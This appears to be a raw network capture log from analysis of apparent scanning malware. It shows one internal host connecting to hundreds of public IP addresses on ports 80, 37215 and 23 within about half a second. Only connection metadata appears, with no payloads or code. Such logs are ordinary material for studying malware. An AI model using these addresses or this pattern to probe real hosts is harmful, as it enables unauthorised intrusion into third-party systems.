                                                          Dec 3, 2024 23:16:51.203685045 CET4059680192.168.2.23192.155.226.89
                                                          Dec 3, 2024 23:16:51.203704119 CET4059680192.168.2.23187.45.88.21
                                                          Dec 3, 2024 23:16:51.203704119 CET4059680192.168.2.23197.155.255.52
                                                          Dec 3, 2024 23:16:51.203718901 CET4059680192.168.2.2327.91.171.21
                                                          Dec 3, 2024 23:16:51.203723907 CET4059680192.168.2.23138.144.89.213
                                                          Dec 3, 2024 23:16:51.203723907 CET4059680192.168.2.23181.64.161.15
                                                          Dec 3, 2024 23:16:51.203737020 CET4059680192.168.2.2364.165.66.139
                                                          Dec 3, 2024 23:16:51.203742981 CET4059680192.168.2.23213.232.18.35
                                                          Dec 3, 2024 23:16:51.203744888 CET4059680192.168.2.23162.125.157.161
                                                          Dec 3, 2024 23:16:51.203753948 CET4059680192.168.2.23198.240.134.155
                                                          Dec 3, 2024 23:16:51.203756094 CET4059680192.168.2.2365.254.114.119
                                                          Dec 3, 2024 23:16:51.203774929 CET4059680192.168.2.23211.233.181.37
                                                          Dec 3, 2024 23:16:51.203774929 CET4059680192.168.2.23221.37.198.191
                                                          Dec 3, 2024 23:16:51.203788042 CET4059680192.168.2.23149.19.64.150
                                                          Dec 3, 2024 23:16:51.203790903 CET4059680192.168.2.2318.241.41.117
                                                          Dec 3, 2024 23:16:51.203794003 CET4059680192.168.2.23137.18.157.144
                                                          Dec 3, 2024 23:16:51.203794003 CET4059680192.168.2.2347.199.116.47
                                                          Dec 3, 2024 23:16:51.203799963 CET4059680192.168.2.23197.171.162.203
                                                          Dec 3, 2024 23:16:51.203808069 CET4059680192.168.2.23109.80.173.14
                                                          Dec 3, 2024 23:16:51.203809977 CET4059680192.168.2.2388.4.3.252
                                                          Dec 3, 2024 23:16:51.203821898 CET4059680192.168.2.23105.192.122.82
                                                          Dec 3, 2024 23:16:51.203826904 CET4059680192.168.2.2337.4.183.171
                                                          Dec 3, 2024 23:16:51.203830004 CET4059680192.168.2.23130.19.238.96
                                                          Dec 3, 2024 23:16:51.203830957 CET4059680192.168.2.2362.84.77.159
                                                          Dec 3, 2024 23:16:51.203846931 CET4059680192.168.2.2340.245.216.11
                                                          Dec 3, 2024 23:16:51.203846931 CET4059680192.168.2.23132.66.47.52
                                                          Dec 3, 2024 23:16:51.203851938 CET4059680192.168.2.23118.184.92.10
                                                          Dec 3, 2024 23:16:51.203861952 CET4059680192.168.2.2337.83.152.196
                                                          Dec 3, 2024 23:16:51.203866959 CET4059680192.168.2.23124.233.176.108
                                                          Dec 3, 2024 23:16:51.203879118 CET4059680192.168.2.2324.203.246.201
                                                          Dec 3, 2024 23:16:51.203881979 CET4059680192.168.2.23149.166.133.79
                                                          Dec 3, 2024 23:16:51.203881979 CET4059680192.168.2.2381.25.145.136
                                                          Dec 3, 2024 23:16:51.203886032 CET4059680192.168.2.238.215.162.114
                                                          Dec 3, 2024 23:16:51.203891039 CET4059680192.168.2.23208.50.130.68
                                                          Dec 3, 2024 23:16:51.203902960 CET4059680192.168.2.2353.91.24.19
                                                          Dec 3, 2024 23:16:51.203902960 CET4059680192.168.2.23195.245.216.217
                                                          Dec 3, 2024 23:16:51.203912020 CET4059680192.168.2.2377.254.162.196
                                                          Dec 3, 2024 23:16:51.203926086 CET4059680192.168.2.23116.75.9.78
                                                          Dec 3, 2024 23:16:51.203937054 CET4059680192.168.2.234.152.5.176
                                                          Dec 3, 2024 23:16:51.203937054 CET4059680192.168.2.23156.252.176.203
                                                          Dec 3, 2024 23:16:51.203938007 CET4059680192.168.2.23180.184.57.201
                                                          Dec 3, 2024 23:16:51.203938007 CET4059680192.168.2.23113.129.237.211
                                                          Dec 3, 2024 23:16:51.203939915 CET4059680192.168.2.2396.25.213.227
                                                          Dec 3, 2024 23:16:51.203939915 CET4059680192.168.2.23105.169.130.109
                                                          Dec 3, 2024 23:16:51.203944921 CET4059680192.168.2.2342.186.149.26
                                                          Dec 3, 2024 23:16:51.203948021 CET4059680192.168.2.23173.41.105.249
                                                          Dec 3, 2024 23:16:51.203948021 CET4059680192.168.2.23108.83.136.165
                                                          Dec 3, 2024 23:16:51.203949928 CET4059680192.168.2.23167.123.30.58
                                                          Dec 3, 2024 23:16:51.203949928 CET4059680192.168.2.23133.97.232.13
                                                          Dec 3, 2024 23:16:51.203954935 CET4059680192.168.2.2327.102.16.235
                                                          Dec 3, 2024 23:16:51.203963995 CET4059680192.168.2.2379.16.100.1
                                                          Dec 3, 2024 23:16:51.203968048 CET4059680192.168.2.2357.241.229.217
                                                          Dec 3, 2024 23:16:51.203979015 CET4059680192.168.2.23221.126.166.132
                                                          Dec 3, 2024 23:16:51.203979015 CET4059680192.168.2.23141.53.115.27
                                                          Dec 3, 2024 23:16:51.203980923 CET4059680192.168.2.2346.174.240.196
                                                          Dec 3, 2024 23:16:51.203983068 CET4059680192.168.2.23174.254.54.159
                                                          Dec 3, 2024 23:16:51.203983068 CET4059680192.168.2.2383.169.222.63
                                                          Dec 3, 2024 23:16:51.203983068 CET4059680192.168.2.234.251.253.169
                                                          Dec 3, 2024 23:16:51.203985929 CET4059680192.168.2.2393.173.113.88
                                                          Dec 3, 2024 23:16:51.203989983 CET4059680192.168.2.23195.137.194.77
                                                          Dec 3, 2024 23:16:51.203989983 CET4059680192.168.2.2393.76.241.95
                                                          Dec 3, 2024 23:16:51.203989983 CET4059680192.168.2.2397.33.131.6
                                                          Dec 3, 2024 23:16:51.203994036 CET4059680192.168.2.23160.97.17.249
                                                          Dec 3, 2024 23:16:51.203994036 CET4059680192.168.2.2360.43.140.43
                                                          Dec 3, 2024 23:16:51.203995943 CET4059680192.168.2.2383.134.138.108
                                                          Dec 3, 2024 23:16:51.204006910 CET4059680192.168.2.238.13.182.109
                                                          Dec 3, 2024 23:16:51.204006910 CET4059680192.168.2.2346.70.189.207
                                                          Dec 3, 2024 23:16:51.204006910 CET4059680192.168.2.2352.78.119.222
                                                          Dec 3, 2024 23:16:51.204021931 CET4059680192.168.2.23217.109.80.247
                                                          Dec 3, 2024 23:16:51.204022884 CET4059680192.168.2.2364.39.47.182
                                                          Dec 3, 2024 23:16:51.204024076 CET4059680192.168.2.2367.190.110.194
                                                          Dec 3, 2024 23:16:51.204024076 CET4059680192.168.2.23199.20.93.125
                                                          Dec 3, 2024 23:16:51.204025030 CET4059680192.168.2.2397.21.175.133
                                                          Dec 3, 2024 23:16:51.204025030 CET4059680192.168.2.2350.29.129.237
                                                          Dec 3, 2024 23:16:51.204025030 CET4059680192.168.2.23133.32.200.196
                                                          Dec 3, 2024 23:16:51.204025030 CET4059680192.168.2.23197.216.10.96
                                                          Dec 3, 2024 23:16:51.204032898 CET4059680192.168.2.2364.166.137.182
                                                          Dec 3, 2024 23:16:51.204037905 CET4059680192.168.2.23141.2.98.131
                                                          Dec 3, 2024 23:16:51.204037905 CET4059680192.168.2.23177.114.44.186
                                                          Dec 3, 2024 23:16:51.204037905 CET4059680192.168.2.23130.203.171.48
                                                          Dec 3, 2024 23:16:51.204042912 CET4059680192.168.2.23211.16.124.76
                                                          Dec 3, 2024 23:16:51.204042912 CET4059680192.168.2.239.210.197.104
                                                          Dec 3, 2024 23:16:51.204054117 CET4059680192.168.2.231.187.159.59
                                                          Dec 3, 2024 23:16:51.204055071 CET4059680192.168.2.234.206.231.141
                                                          Dec 3, 2024 23:16:51.204060078 CET4059680192.168.2.23149.206.78.156
                                                          Dec 3, 2024 23:16:51.204062939 CET4059680192.168.2.2369.248.199.239
                                                          Dec 3, 2024 23:16:51.204062939 CET4059680192.168.2.23153.1.133.204
                                                          Dec 3, 2024 23:16:51.204080105 CET4059680192.168.2.23145.218.53.164
                                                          Dec 3, 2024 23:16:51.204081059 CET4059680192.168.2.2319.199.34.52
                                                          Dec 3, 2024 23:16:51.204086065 CET4059680192.168.2.2353.118.111.164
                                                          Dec 3, 2024 23:16:51.204087019 CET4059680192.168.2.2367.186.210.125
                                                          Dec 3, 2024 23:16:51.204102993 CET4059680192.168.2.2370.227.40.157
                                                          Dec 3, 2024 23:16:51.204106092 CET4059680192.168.2.23152.220.91.74
                                                          Dec 3, 2024 23:16:51.204109907 CET4059680192.168.2.23194.83.154.7
                                                          Dec 3, 2024 23:16:51.204109907 CET4059680192.168.2.23145.24.44.14
                                                          Dec 3, 2024 23:16:51.204123974 CET4059680192.168.2.2371.41.213.199
                                                          Dec 3, 2024 23:16:51.204129934 CET4059680192.168.2.2376.229.242.111
                                                          Dec 3, 2024 23:16:51.204132080 CET4059680192.168.2.23150.195.35.109
                                                          Dec 3, 2024 23:16:51.204138994 CET4059680192.168.2.2343.224.28.143
                                                          Dec 3, 2024 23:16:51.204144955 CET4059680192.168.2.23120.173.189.117
                                                          Dec 3, 2024 23:16:51.204163074 CET4059680192.168.2.23216.144.174.182
                                                          Dec 3, 2024 23:16:51.204163074 CET4059680192.168.2.23221.228.66.92
                                                          Dec 3, 2024 23:16:51.204164028 CET4059680192.168.2.2389.56.146.167
                                                          Dec 3, 2024 23:16:51.204164982 CET4059680192.168.2.23107.218.141.157
                                                          Dec 3, 2024 23:16:51.204179049 CET4059680192.168.2.23203.125.59.146
                                                          Dec 3, 2024 23:16:51.204179049 CET4059680192.168.2.23125.210.110.12
                                                          Dec 3, 2024 23:16:51.204179049 CET4059680192.168.2.2319.241.213.43
                                                          Dec 3, 2024 23:16:51.204183102 CET4059680192.168.2.2369.200.99.182
                                                          Dec 3, 2024 23:16:51.204185963 CET4059680192.168.2.23131.153.203.242
                                                          Dec 3, 2024 23:16:51.204190016 CET4059680192.168.2.2345.26.129.92
                                                          Dec 3, 2024 23:16:51.204200983 CET4059680192.168.2.2318.240.192.17
                                                          Dec 3, 2024 23:16:51.204200983 CET4059680192.168.2.23155.105.86.247
                                                          Dec 3, 2024 23:16:51.204210043 CET4059680192.168.2.2360.58.12.36
                                                          Dec 3, 2024 23:16:51.204216003 CET4059680192.168.2.2340.45.113.71
                                                          Dec 3, 2024 23:16:51.204227924 CET4059680192.168.2.2327.168.59.130
                                                          Dec 3, 2024 23:16:51.204236031 CET4059680192.168.2.23160.228.2.61
                                                          Dec 3, 2024 23:16:51.204240084 CET4059680192.168.2.23101.16.231.184
                                                          Dec 3, 2024 23:16:51.204240084 CET4059680192.168.2.23110.231.125.113
                                                          Dec 3, 2024 23:16:51.204240084 CET4059680192.168.2.23140.164.114.89
                                                          Dec 3, 2024 23:16:51.204252958 CET4059680192.168.2.2361.151.214.66
                                                          Dec 3, 2024 23:16:51.204258919 CET4059680192.168.2.2391.234.94.248
                                                          Dec 3, 2024 23:16:51.204261065 CET4059680192.168.2.23145.181.3.32
                                                          Dec 3, 2024 23:16:51.204266071 CET4059680192.168.2.23123.198.203.193
                                                          Dec 3, 2024 23:16:51.204266071 CET4059680192.168.2.234.137.56.255
                                                          Dec 3, 2024 23:16:51.204274893 CET4059680192.168.2.2358.1.16.233
                                                          Dec 3, 2024 23:16:51.204287052 CET4059680192.168.2.23197.148.124.64
                                                          Dec 3, 2024 23:16:51.204297066 CET4059680192.168.2.23195.22.24.33
                                                          Dec 3, 2024 23:16:51.204298973 CET4059680192.168.2.2325.205.38.122
                                                          Dec 3, 2024 23:16:51.204303026 CET4059680192.168.2.2341.113.120.139
                                                          Dec 3, 2024 23:16:51.204313040 CET4059680192.168.2.23222.82.14.113
                                                          Dec 3, 2024 23:16:51.204313040 CET4059680192.168.2.2332.158.177.237
                                                          Dec 3, 2024 23:16:51.204323053 CET4059680192.168.2.23151.66.82.53
                                                          Dec 3, 2024 23:16:51.204324007 CET4059680192.168.2.23141.86.136.179
                                                          Dec 3, 2024 23:16:51.204330921 CET4059680192.168.2.2372.99.112.239
                                                          Dec 3, 2024 23:16:51.204330921 CET4059680192.168.2.2345.174.159.128
                                                          Dec 3, 2024 23:16:51.204341888 CET4059680192.168.2.23195.87.192.25
                                                          Dec 3, 2024 23:16:51.204348087 CET4059680192.168.2.23166.47.41.237
                                                          Dec 3, 2024 23:16:51.204361916 CET4059680192.168.2.238.129.215.9
                                                          Dec 3, 2024 23:16:51.204365015 CET4059680192.168.2.23145.139.250.59
                                                          Dec 3, 2024 23:16:51.204368114 CET4059680192.168.2.2370.104.198.41
                                                          Dec 3, 2024 23:16:51.204385996 CET4059680192.168.2.23162.181.219.24
                                                          Dec 3, 2024 23:16:51.204385996 CET4059680192.168.2.23151.110.61.57
                                                          Dec 3, 2024 23:16:51.204387903 CET4059680192.168.2.23169.166.164.65
                                                          Dec 3, 2024 23:16:51.204387903 CET4059680192.168.2.23116.41.243.45
                                                          Dec 3, 2024 23:16:51.204389095 CET4059680192.168.2.23218.202.254.68
                                                          Dec 3, 2024 23:16:51.204395056 CET4059680192.168.2.2391.236.218.119
                                                          Dec 3, 2024 23:16:51.204396009 CET4059680192.168.2.2353.52.94.153
                                                          Dec 3, 2024 23:16:51.204396963 CET4059680192.168.2.2396.201.167.137
                                                          Dec 3, 2024 23:16:51.204416990 CET4059680192.168.2.2397.89.167.131
                                                          Dec 3, 2024 23:16:51.204416990 CET4059680192.168.2.2349.101.52.71
                                                          Dec 3, 2024 23:16:51.204420090 CET4059680192.168.2.23107.174.24.41
                                                          Dec 3, 2024 23:16:51.204426050 CET4059680192.168.2.2378.189.219.177
                                                          Dec 3, 2024 23:16:51.204426050 CET4059680192.168.2.23106.237.26.60
                                                          Dec 3, 2024 23:16:51.204431057 CET4059680192.168.2.23117.3.252.26
                                                          Dec 3, 2024 23:16:51.204452038 CET4059680192.168.2.23129.207.125.206
                                                          Dec 3, 2024 23:16:51.204452991 CET4059680192.168.2.23182.69.49.77
                                                          Dec 3, 2024 23:16:51.204463005 CET4059680192.168.2.23161.247.211.218
                                                          Dec 3, 2024 23:16:51.204463005 CET4059680192.168.2.23177.15.100.195
                                                          Dec 3, 2024 23:16:51.204463005 CET4059680192.168.2.2396.141.45.144
                                                          Dec 3, 2024 23:16:51.204463959 CET4059680192.168.2.2312.197.2.24
                                                          Dec 3, 2024 23:16:51.204464912 CET4059680192.168.2.23220.179.234.167
                                                          Dec 3, 2024 23:16:51.204468966 CET4059680192.168.2.2354.122.219.102
                                                          Dec 3, 2024 23:16:51.204478979 CET4059680192.168.2.23139.79.211.61
                                                          Dec 3, 2024 23:16:51.204487085 CET4059680192.168.2.2376.167.103.3
                                                          Dec 3, 2024 23:16:51.204492092 CET4059680192.168.2.2338.135.199.218
                                                          Dec 3, 2024 23:16:51.204508066 CET4059680192.168.2.23121.71.153.59
                                                          Dec 3, 2024 23:16:51.204509974 CET4059680192.168.2.2374.105.202.217
                                                          Dec 3, 2024 23:16:51.204508066 CET4059680192.168.2.23184.145.240.130
                                                          Dec 3, 2024 23:16:51.204509974 CET4059680192.168.2.23126.116.235.25
                                                          Dec 3, 2024 23:16:51.204514027 CET4059680192.168.2.23186.189.70.61
                                                          Dec 3, 2024 23:16:51.204514027 CET4059680192.168.2.2324.121.132.37
                                                          Dec 3, 2024 23:16:51.204519987 CET4059680192.168.2.23217.104.241.152
                                                          Dec 3, 2024 23:16:51.204526901 CET4059680192.168.2.23137.58.193.142
                                                          Dec 3, 2024 23:16:51.204539061 CET4059680192.168.2.23209.94.156.81
                                                          Dec 3, 2024 23:16:51.204540968 CET4059680192.168.2.23208.79.162.0
                                                          Dec 3, 2024 23:16:51.204550028 CET4059680192.168.2.2323.237.204.51
                                                          Dec 3, 2024 23:16:51.204550028 CET4059680192.168.2.2375.88.242.39
                                                          Dec 3, 2024 23:16:51.204564095 CET4059680192.168.2.23140.96.53.89
                                                          Dec 3, 2024 23:16:51.204569101 CET4059680192.168.2.2317.204.52.59
                                                          Dec 3, 2024 23:16:51.204571962 CET4059680192.168.2.23136.223.133.116
                                                          Dec 3, 2024 23:16:51.204579115 CET4059680192.168.2.23187.152.59.159
                                                          Dec 3, 2024 23:16:51.204586983 CET4059680192.168.2.23192.198.76.74
                                                          Dec 3, 2024 23:16:51.204593897 CET4059680192.168.2.2338.156.140.56
                                                          Dec 3, 2024 23:16:51.204601049 CET4059680192.168.2.2342.166.202.125
                                                          Dec 3, 2024 23:16:51.204605103 CET4059680192.168.2.23187.208.85.211
                                                          Dec 3, 2024 23:16:51.204607964 CET4059680192.168.2.23165.63.43.74
                                                          Dec 3, 2024 23:16:51.204607964 CET4059680192.168.2.23218.120.75.152
                                                          Dec 3, 2024 23:16:51.204624891 CET4059680192.168.2.2353.170.36.40
                                                          Dec 3, 2024 23:16:51.204628944 CET4059680192.168.2.23156.129.186.59
                                                          Dec 3, 2024 23:16:51.204647064 CET4059680192.168.2.23106.14.91.180
                                                          Dec 3, 2024 23:16:51.204647064 CET4059680192.168.2.2348.143.195.91
                                                          Dec 3, 2024 23:16:51.204647064 CET4059680192.168.2.2334.15.95.122
                                                          Dec 3, 2024 23:16:51.204651117 CET4059680192.168.2.23175.163.205.14
                                                          Dec 3, 2024 23:16:51.204651117 CET4059680192.168.2.23154.61.99.173
                                                          Dec 3, 2024 23:16:51.204653978 CET4059680192.168.2.23206.214.217.164
                                                          Dec 3, 2024 23:16:51.204660892 CET4059680192.168.2.23157.71.69.21
                                                          Dec 3, 2024 23:16:51.204679966 CET4059680192.168.2.23173.35.111.72
                                                          Dec 3, 2024 23:16:51.204679966 CET4059680192.168.2.23140.68.58.170
                                                          Dec 3, 2024 23:16:51.204687119 CET4059680192.168.2.23172.188.79.238
                                                          Dec 3, 2024 23:16:51.204688072 CET4059680192.168.2.2361.99.4.65
                                                          Dec 3, 2024 23:16:51.204690933 CET4059680192.168.2.23179.130.13.25
                                                          Dec 3, 2024 23:16:51.204690933 CET4059680192.168.2.2393.16.206.80
                                                          Dec 3, 2024 23:16:51.204703093 CET4059680192.168.2.2374.251.66.120
                                                          Dec 3, 2024 23:16:51.204708099 CET4059680192.168.2.23177.189.187.148
                                                          Dec 3, 2024 23:16:51.204713106 CET4059680192.168.2.23169.31.199.124
                                                          Dec 3, 2024 23:16:51.204731941 CET4059680192.168.2.23210.59.25.247
                                                          Dec 3, 2024 23:16:51.204731941 CET4059680192.168.2.23169.75.82.44
                                                          Dec 3, 2024 23:16:51.204736948 CET4059680192.168.2.2339.179.93.158
                                                          Dec 3, 2024 23:16:51.204739094 CET4059680192.168.2.2375.115.147.41
                                                          Dec 3, 2024 23:16:51.204741955 CET4059680192.168.2.2350.93.146.88
                                                          Dec 3, 2024 23:16:51.204761982 CET4059680192.168.2.23174.141.30.72
                                                          Dec 3, 2024 23:16:51.204760075 CET4059680192.168.2.2351.221.133.35
                                                          Dec 3, 2024 23:16:51.204780102 CET4059680192.168.2.23104.220.239.26
                                                          Dec 3, 2024 23:16:51.204780102 CET4059680192.168.2.2372.157.35.236
                                                          Dec 3, 2024 23:16:51.204797029 CET4059680192.168.2.23110.160.55.40
                                                          Dec 3, 2024 23:16:51.204797029 CET4059680192.168.2.23125.158.168.165
                                                          Dec 3, 2024 23:16:51.204797029 CET4059680192.168.2.2365.141.30.110
                                                          Dec 3, 2024 23:16:51.204816103 CET4059680192.168.2.2323.111.243.35
                                                          Dec 3, 2024 23:16:51.204818964 CET4059680192.168.2.2327.53.28.194
                                                          Dec 3, 2024 23:16:51.204828024 CET4059680192.168.2.23126.17.60.242
                                                          Dec 3, 2024 23:16:51.204833031 CET4059680192.168.2.2370.26.233.31
                                                          Dec 3, 2024 23:16:51.204845905 CET4059680192.168.2.23153.222.84.61
                                                          Dec 3, 2024 23:16:51.204854965 CET4059680192.168.2.23164.53.169.164
                                                          Dec 3, 2024 23:16:51.204858065 CET4059680192.168.2.2360.35.44.11
                                                          Dec 3, 2024 23:16:51.204863071 CET4059680192.168.2.23102.253.101.70
                                                          Dec 3, 2024 23:16:51.204863071 CET4059680192.168.2.2347.120.165.132
                                                          Dec 3, 2024 23:16:51.204879045 CET4059680192.168.2.23123.7.154.34
                                                          Dec 3, 2024 23:16:51.204883099 CET4059680192.168.2.23175.73.222.113
                                                          Dec 3, 2024 23:16:51.204898119 CET4059680192.168.2.2399.15.43.16
                                                          Dec 3, 2024 23:16:51.204899073 CET4059680192.168.2.2399.34.235.228
                                                          Dec 3, 2024 23:16:51.204904079 CET4059680192.168.2.23168.25.113.7
                                                          Dec 3, 2024 23:16:51.204904079 CET4059680192.168.2.23103.65.242.121
                                                          Dec 3, 2024 23:16:51.204906940 CET4059680192.168.2.2378.9.253.102
                                                          Dec 3, 2024 23:16:51.204916000 CET4059680192.168.2.2388.13.151.25
                                                          Dec 3, 2024 23:16:51.204931021 CET4059680192.168.2.23158.12.88.105
                                                          Dec 3, 2024 23:16:51.204931021 CET4059680192.168.2.23201.133.217.110
                                                          Dec 3, 2024 23:16:51.204931021 CET4059680192.168.2.2388.226.113.39
                                                          Dec 3, 2024 23:16:51.204935074 CET4059680192.168.2.2372.10.56.47
                                                          Dec 3, 2024 23:16:51.230963945 CET3721539802156.202.143.176192.168.2.23
                                                          Dec 3, 2024 23:16:51.231367111 CET3721539952156.202.143.176192.168.2.23
                                                          Dec 3, 2024 23:16:51.231410027 CET3995237215192.168.2.23156.202.143.176
                                                          Dec 3, 2024 23:16:51.231441975 CET3995237215192.168.2.23156.202.143.176
                                                          Dec 3, 2024 23:16:51.231585979 CET3721535454197.99.145.0192.168.2.23
                                                          Dec 3, 2024 23:16:51.231627941 CET3545437215192.168.2.23197.99.145.0
                                                          Dec 3, 2024 23:16:51.231700897 CET3721533164156.104.224.250192.168.2.23
                                                          Dec 3, 2024 23:16:51.231759071 CET3721533310156.104.224.250192.168.2.23
                                                          Dec 3, 2024 23:16:51.231797934 CET3331037215192.168.2.23156.104.224.250
                                                          Dec 3, 2024 23:16:51.231806993 CET3331037215192.168.2.23156.104.224.250
                                                          Dec 3, 2024 23:16:51.232383013 CET372155490841.50.237.224192.168.2.23
                                                          Dec 3, 2024 23:16:51.232430935 CET372155505441.50.237.224192.168.2.23
                                                          Dec 3, 2024 23:16:51.232471943 CET5505437215192.168.2.2341.50.237.224
                                                          Dec 3, 2024 23:16:51.232484102 CET5505437215192.168.2.2341.50.237.224
                                                          Dec 3, 2024 23:16:51.232810974 CET3721543802156.7.205.183192.168.2.23
                                                          Dec 3, 2024 23:16:51.233318090 CET3721543948156.7.205.183192.168.2.23
                                                          Dec 3, 2024 23:16:51.233360052 CET4394837215192.168.2.23156.7.205.183
                                                          Dec 3, 2024 23:16:51.233370066 CET4394837215192.168.2.23156.7.205.183
                                                          Dec 3, 2024 23:16:51.233540058 CET3721542332197.171.142.249192.168.2.23
                                                          Dec 3, 2024 23:16:51.234317064 CET3721538650156.124.6.104192.168.2.23
                                                          Dec 3, 2024 23:16:51.235351086 CET3721543914156.181.180.180192.168.2.23
                                                          Dec 3, 2024 23:16:51.235641003 CET3721543946156.181.180.180192.168.2.23
                                                          Dec 3, 2024 23:16:51.235682964 CET4394637215192.168.2.23156.181.180.180
                                                          Dec 3, 2024 23:16:51.235697985 CET4394637215192.168.2.23156.181.180.180
                                                          Dec 3, 2024 23:16:51.235980034 CET3721553868197.175.227.30192.168.2.23
                                                          Dec 3, 2024 23:16:51.236501932 CET3721556700156.55.85.23192.168.2.23
                                                          Dec 3, 2024 23:16:51.238827944 CET3721552520156.101.193.95192.168.2.23
                                                          Dec 3, 2024 23:16:51.275935888 CET3721533164156.104.224.250192.168.2.23
                                                          Dec 3, 2024 23:16:51.275949001 CET3721539802156.202.143.176192.168.2.23
                                                          Dec 3, 2024 23:16:51.279896975 CET3721543914156.181.180.180192.168.2.23
                                                          Dec 3, 2024 23:16:51.279934883 CET3721538650156.124.6.104192.168.2.23
                                                          Dec 3, 2024 23:16:51.279943943 CET3721542332197.171.142.249192.168.2.23
                                                          Dec 3, 2024 23:16:51.279959917 CET3721543802156.7.205.183192.168.2.23
                                                          Dec 3, 2024 23:16:51.279993057 CET372155490841.50.237.224192.168.2.23
                                                          Dec 3, 2024 23:16:51.280002117 CET3721552520156.101.193.95192.168.2.23
                                                          Dec 3, 2024 23:16:51.280041933 CET3721556700156.55.85.23192.168.2.23
                                                          Dec 3, 2024 23:16:51.280051947 CET3721553868197.175.227.30192.168.2.23
                                                          Dec 3, 2024 23:16:51.327111006 CET804059698.23.1.12192.168.2.23
                                                          Dec 3, 2024 23:16:51.327275991 CET4059680192.168.2.2398.23.1.12
                                                          Dec 3, 2024 23:16:51.327502012 CET804201413.3.191.55192.168.2.23
                                                          Dec 3, 2024 23:16:51.327543020 CET4201480192.168.2.2313.3.191.55
                                                          Dec 3, 2024 23:16:51.327979088 CET804059667.186.194.136192.168.2.23
                                                          Dec 3, 2024 23:16:51.327989101 CET804059657.118.124.196192.168.2.23
                                                          Dec 3, 2024 23:16:51.327997923 CET804059685.157.24.226192.168.2.23
                                                          Dec 3, 2024 23:16:51.328027010 CET4059680192.168.2.2367.186.194.136
                                                          Dec 3, 2024 23:16:51.328031063 CET4059680192.168.2.2357.118.124.196
                                                          Dec 3, 2024 23:16:51.328031063 CET4059680192.168.2.2385.157.24.226
                                                          Dec 3, 2024 23:16:51.328035116 CET804059642.96.90.150192.168.2.23
                                                          Dec 3, 2024 23:16:51.328053951 CET8060694194.223.37.30192.168.2.23
                                                          Dec 3, 2024 23:16:51.328063965 CET804151653.125.178.189192.168.2.23
                                                          Dec 3, 2024 23:16:51.328073978 CET4059680192.168.2.2342.96.90.150
                                                          Dec 3, 2024 23:16:51.328077078 CET8060796108.165.135.39192.168.2.23
                                                          Dec 3, 2024 23:16:51.328087091 CET8058850105.92.24.72192.168.2.23
                                                          Dec 3, 2024 23:16:51.328095913 CET8041702160.108.6.246192.168.2.23
                                                          Dec 3, 2024 23:16:51.328105927 CET8040596153.109.96.159192.168.2.23
                                                          Dec 3, 2024 23:16:51.328109026 CET4151680192.168.2.2353.125.178.189
                                                          Dec 3, 2024 23:16:51.328135014 CET4059680192.168.2.23153.109.96.159
                                                          Dec 3, 2024 23:16:51.328249931 CET8040596173.42.62.157192.168.2.23
                                                          Dec 3, 2024 23:16:51.328259945 CET8040596168.72.114.103192.168.2.23
                                                          Dec 3, 2024 23:16:51.328268051 CET8040596209.190.249.42192.168.2.23
                                                          Dec 3, 2024 23:16:51.328277111 CET8041702160.108.6.246192.168.2.23
                                                          Dec 3, 2024 23:16:51.328286886 CET4059680192.168.2.23173.42.62.157
                                                          Dec 3, 2024 23:16:51.328288078 CET4059680192.168.2.23168.72.114.103
                                                          Dec 3, 2024 23:16:51.328308105 CET4059680192.168.2.23209.190.249.42
                                                          Dec 3, 2024 23:16:51.328309059 CET4170280192.168.2.23160.108.6.246
                                                          Dec 3, 2024 23:16:51.328473091 CET8060694194.223.37.30192.168.2.23
                                                          Dec 3, 2024 23:16:51.328515053 CET6069480192.168.2.23194.223.37.30
                                                          Dec 3, 2024 23:16:51.328682899 CET8058850105.92.24.72192.168.2.23
                                                          Dec 3, 2024 23:16:51.328723907 CET5885080192.168.2.23105.92.24.72
                                                          Dec 3, 2024 23:16:51.328849077 CET8060796108.165.135.39192.168.2.23
                                                          Dec 3, 2024 23:16:51.328887939 CET6079680192.168.2.23108.165.135.39
                                                          Dec 3, 2024 23:16:51.355551004 CET3721539952156.202.143.176192.168.2.23
                                                          Dec 3, 2024 23:16:51.355683088 CET3995237215192.168.2.23156.202.143.176
                                                          Dec 3, 2024 23:16:51.355906010 CET3721533310156.104.224.250192.168.2.23
                                                          Dec 3, 2024 23:16:51.355926037 CET3721533310156.104.224.250192.168.2.23
                                                          Dec 3, 2024 23:16:51.355968952 CET3331037215192.168.2.23156.104.224.250
                                                          Dec 3, 2024 23:16:51.356452942 CET372155505441.50.237.224192.168.2.23
                                                          Dec 3, 2024 23:16:51.356496096 CET5505437215192.168.2.2341.50.237.224
                                                          Dec 3, 2024 23:16:51.357245922 CET3721543948156.7.205.183192.168.2.23
                                                          Dec 3, 2024 23:16:51.357287884 CET4394837215192.168.2.23156.7.205.183
                                                          Dec 3, 2024 23:16:51.359606028 CET3721543946156.181.180.180192.168.2.23
                                                          Dec 3, 2024 23:16:51.359663963 CET4394637215192.168.2.23156.181.180.180
                                                          Dec 3, 2024 23:16:51.477458000 CET8039544209.58.154.1192.168.2.23
                                                          Dec 3, 2024 23:16:51.477617979 CET3954480192.168.2.23209.58.154.1
                                                          Dec 3, 2024 23:16:51.725959063 CET4060223192.168.2.23120.24.186.17
                                                          Dec 3, 2024 23:16:51.725959063 CET4060223192.168.2.23175.222.56.168
                                                          Dec 3, 2024 23:16:51.725959063 CET4060223192.168.2.2375.61.49.52
                                                          Dec 3, 2024 23:16:51.725960016 CET4060223192.168.2.2375.162.165.80
                                                          Dec 3, 2024 23:16:51.725960016 CET4060223192.168.2.23202.104.107.220
                                                          Dec 3, 2024 23:16:51.725960970 CET4060223192.168.2.2363.175.33.182
                                                          Dec 3, 2024 23:16:51.725960970 CET4060223192.168.2.23103.107.216.48
                                                          Dec 3, 2024 23:16:51.725960970 CET4060223192.168.2.23219.139.250.193
                                                          Dec 3, 2024 23:16:51.725960970 CET4060223192.168.2.2379.133.86.184
                                                          Dec 3, 2024 23:16:51.725960970 CET4060223192.168.2.23205.199.180.113
                                                          Dec 3, 2024 23:16:51.725960970 CET4060223192.168.2.23102.248.246.78
                                                          Dec 3, 2024 23:16:51.725960970 CET4060223192.168.2.23125.129.42.25
                                                          Dec 3, 2024 23:16:51.725966930 CET4060223192.168.2.2339.154.134.101
                                                          Dec 3, 2024 23:16:51.725960970 CET4060223192.168.2.23169.88.32.122
                                                          Dec 3, 2024 23:16:51.725966930 CET4060223192.168.2.2332.132.122.68
                                                          Dec 3, 2024 23:16:51.725960970 CET4060223192.168.2.2371.38.129.112
                                                          Dec 3, 2024 23:16:51.725960970 CET4060223192.168.2.23207.46.174.64
                                                          Dec 3, 2024 23:16:51.725960970 CET4060223192.168.2.2319.134.78.109
